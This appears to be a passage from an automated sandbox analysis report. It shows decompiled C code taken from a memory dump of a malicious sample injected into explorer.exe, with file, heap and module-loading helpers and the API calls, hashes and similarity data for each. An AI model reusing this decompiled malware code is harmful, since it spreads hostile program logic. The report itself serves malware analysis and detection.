					_t47 = E000CA63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xde684; // 0x280f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xde684; // 0x280f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000C861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E000C8604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














        0x000ca6ac
        0x000ca6ad
        0x000ca6ae
        0x000ca6b2
        0x000ca6b4
        0x000ca6b9
        0x000ca6c9
        0x000ca6cd
        0x000ca757
        0x000ca757
        0x000ca759
        0x000ca75b
        0x000ca75d
        0x000ca75d
        0x000ca6d3
        0x000ca6e1
        0x000ca6e5
        0x000ca73d
        0x000ca73d
        0x000ca743
        0x000ca748
        0x000ca750
        0x000ca756
        0x00000000
        0x000ca748
        0x000ca6e7
        0x000ca6eb
        0x000ca6f0
        0x000ca6f2
        0x000ca6f8
        0x00000000
        0x00000000
        0x000ca6fc
        0x000ca6ff
        0x000ca700
        0x000ca706
        0x000ca707
        0x000ca708
        0x000ca72d
        0x000ca70f
        0x000ca761
        0x00000000
        0x00000000
        0x000ca763
        0x000ca766
        0x000ca76c
        0x000ca76e
        0x000ca76e
        0x000ca776
        0x000ca779
        0x00000000
        0x000ca779
        0x000ca717
        0x000ca71a
        0x000ca71e
        0x000ca720
        0x000ca723
        0x000ca728
        0x000ca72c
        0x000ca72c
        0x00000000
        0x000ca72d
        0x000ca6bb
        0x00000000

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
        • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,0280FD30,00000400), ref: 000CA776
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: d5b9e2c125e3a6782304b39fb1a2c8e3bdc11931331a1832afc7fef28024e27c
        • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
        • Opcode Fuzzy Hash: d5b9e2c125e3a6782304b39fb1a2c8e3bdc11931331a1832afc7fef28024e27c
        • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5CEC, Relevance: 3.0, APIs: 2, Instructions: 38COMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 100%
        			E000C5CEC() {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t22;
				void* _t33;

				_t8 =  *0xde688; // 0xf0000
				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000C85EF();
				E000C8F78();
				 *0xde780 = 0;
				 *0xde784 = 0;
				 *0xde77c = 0;
				E000C5EB6(); // executed
				E000CCF84(_t22);
				_t14 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
				E000CB337( &_v44);
				memset( &_v44, 0, 0x27);
				E000C5C26( &_v44, _t33);
				ExitProcess(0);
			}









        0x000c5cef
        0x000c5cfe
        0x000c5d03
        0x000c5d08
        0x000c5d0f
        0x000c5d15
        0x000c5d1b
        0x000c5d21
        0x000c5d26
        0x000c5d2b
        0x000c5d33
        0x000c5d3d
        0x000c5d4b
        0x000c5d53
        0x000c5d5f
        0x000c5d67
        0x000c5d72

        APIs
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
          • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
          • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
          • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
          • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
          • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        • memset.MSVCRT ref: 000C5D5F
        • ExitProcess.KERNELBASE(00000000,?,?,?), ref: 000C5D72
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Process$Currentmemset$CloseCreateExitFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 1180775259-0
        • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
        • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 247 ce1bc-ce1dc call c95c7 250 ce1de-ce1e4 GetModuleHandleA 247->250 251 ce1e6-ce1eb LoadLibraryA 247->251 252 ce1ed-ce1ef 250->252 251->252 253 ce1fe-ce20c call c85c2 252->253 254 ce1f1-ce1f6 call ce171 252->254 257 ce1fb-ce1fc 254->257 257->253
        C-Code - Quality: 47%
        			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000C95C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E000CE171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000C85C2( &_v8);
				return _t25;
			}










        0x000ce1bf
        0x000ce1c2
        0x000ce1c8
        0x000ce1ca
        0x000ce1cf
        0x000ce1d1
        0x000ce1db
        0x000ce1dc
        0x000ce1eb
        0x000ce1de
        0x000ce1de
        0x000ce1de
        0x000ce1ef
        0x000ce1f6
        0x000ce1fc
        0x000ce1fc
        0x000ce201
        0x000ce20c

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
        • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 259 ca65c-ca66d 260 ca69e-ca6a0 259->260 261 ca66f-ca691 WriteFile 259->261 264 ca6a1-ca6a4 260->264 262 ca6a5-ca6a7 261->262 263 ca693-ca69c 261->263 262->264 263->260 263->261
        C-Code - Quality: 88%
        			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









        0x000ca65c
        0x000ca65f
        0x000ca660
        0x000ca663
        0x000ca665
        0x000ca668
        0x000ca66d
        0x000ca69e
        0x000ca6a0
        0x000ca66f
        0x000ca66f
        0x000ca66f
        0x000ca691
        0x00000000
        0x00000000
        0x000ca693
        0x000ca696
        0x000ca69c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000ca69c
        0x000ca6a5
        0x000ca6a5
        0x000ca6a1
        0x000ca6a4

        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
        • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 265 ca5f7-ca61a CreateFileW 266 ca61c-ca61e 265->266 267 ca620-ca623 265->267 268 ca637-ca63a 266->268 269 ca635 267->269 270 ca625-ca62e 267->270 269->268 270->269
        C-Code - Quality: 100%
        			E000CA5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xde684; // 0x280f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






        0x000ca601
        0x000ca615
        0x000ca61a
        0x000ca623
        0x000ca625
        0x000ca62f
        0x000ca62f
        0x00000000
        0x000ca635
        0x00000000

        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
        • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 271 ca63b-ca65b CreateFileW
        C-Code - Quality: 68%
        			E000CA63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




        0x000ca64f
        0x000ca652
        0x000ca657
        0x000ca65b

        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
        • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C8604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 272 c8604-c8619 RtlAllocateHeap
        C-Code - Quality: 100%
        			E000C8604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
				return _t2;
			}




        0x000c8612
        0x000c8619

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
        • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C85EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 273 c85ef-c8603 HeapCreate
        C-Code - Quality: 100%
        			E000C85EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xde768 = _t1;
				return _t1;
			}




        0x000c85f8
        0x000c85fe
        0x000c8603

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
        • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CF9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CF9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0xde654; // 0x280fd30
				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0xde654; // 0x280fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000C86E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E000C109A(_t63, 0x34a);
						_t66 =  *0xde688; // 0xf0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0xde688; // 0xf0000
						_push(_t67);
						_v20 = E000C92E5(_t39 + 0x1020);
						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000C85D5( &_v24);
						E000C85D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0xde654; // 0x280fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E000C861A( &_v16, _t69);
						E000C861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0xde654; // 0x280fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0xde688; // 0xf0000
						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0xde654; // 0x280fd30
							continue;
						}
						break;
					}
					E000C861A( &_v12, 0); // executed
				}
				return 0;
			}

























        0x000cf9c5
        0x000cf9cd
        0x000cf9d2
        0x000cf9d8
        0x000cf9de
        0x000cf9f1
        0x000cf9fb
        0x000cfa05
        0x000cfa08
        0x000cfa0d
        0x000cfa23
        0x000cfa27
        0x000cfa2c
        0x000cfa2d
        0x000cfa2e
        0x000cfa33
        0x000cfa36
        0x000cfa37
        0x000cfa38
        0x000cfa3d
        0x000cfa4c
        0x000cfa51
        0x000cfa56
        0x000cfa5d
        0x000cfa66
        0x000cfa6b
        0x000cfa6e
        0x000cfa71
        0x000cfa76
        0x000cfa7c
        0x000cfa81
        0x000cfa86
        0x000cfa89
        0x000cfa9c
        0x000cfaa1
        0x000cfaa4
        0x000cfaa4
        0x000cfaac
        0x000cfab7
        0x000cfabc
        0x000cfabf
        0x000cfac2
        0x000cfac2
        0x000cfac8
        0x000cfaca
        0x000cface
        0x000cfad9
        0x000cfade
        0x000cfae3
        0x00000000
        0x00000000
        0x000cfaec
        0x000cfaf2
        0x000cfaf9
        0x000cfafb
        0x000cfafe
        0x00000000
        0x000cfafe
        0x00000000
        0x000cfaf9
        0x000cfb0b
        0x000cfb14
        0x000cfb18

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: ff03731fb7cec7f2ce6ab9bc1402b2993290a223dea6d4185847bfae306a6c5f
        • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
        • Opcode Fuzzy Hash: ff03731fb7cec7f2ce6ab9bc1402b2993290a223dea6d4185847bfae306a6c5f
        • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E000C5D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xde684; // 0x280f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xde688; // 0xf0000
					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xde6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E000C9EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xde688; // 0xf0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















        0x000c5d80
        0x000c5d95
        0x000c5d9e
        0x000c5da7
        0x000c5da9
        0x000c5db1
        0x000c5dc1
        0x000c5dcf
        0x000c5dd4
        0x000c5dd9
        0x000c5ddb
        0x000c5ddd
        0x000c5de2
        0x000c5de4
        0x000c5dff
        0x000c5dff
        0x000c5de6
        0x000c5de7
        0x000c5df2
        0x000c5dfa
        0x000c5dfc
        0x000c5dfc
        0x000c5de4
        0x000c5e01
        0x000c5db3
        0x000c5db4
        0x000c5db9
        0x000c5dbe
        0x000c5dbe
        0x000c5e05

        APIs
        • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
        • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CBA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0xde68c; // 0x280fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E000CB998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0xde684; // 0x280f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












        0x000cba0a
        0x000cba12
        0x000cba1a
        0x000cba1f
        0x000cba29
        0x000cba32
        0x000cba37
        0x000cba3c
        0x000cba5a
        0x000cba5d
        0x000cba3e
        0x000cba41
        0x000cba43
        0x000cba4b
        0x000cba4b
        0x000cba4e
        0x000cba4e
        0x000cba61
        0x000cba22
        0x000cba22
        0x000cba22

        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
        • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E000CC392(_t9);
						}
					} else {
						_t4 = E000CC379(_t9);
					}
					E000C874F(_t9, 0, _t4);
					_t3 = HeapFree( *0xde768, 0, _t9); // executed
				}
				return _t3;
			}






        0x000c861d
        0x000c8622
        0x000c8668
        0x000c8668
        0x000c8625
        0x000c8629
        0x000c862b
        0x000c862e
        0x000c8634
        0x000c8642
        0x000c8646
        0x000c8646
        0x000c8636
        0x000c8637
        0x000c863c
        0x000c864f
        0x000c8660
        0x000c8660
        0x00000000

        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
        • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
        Uniqueness

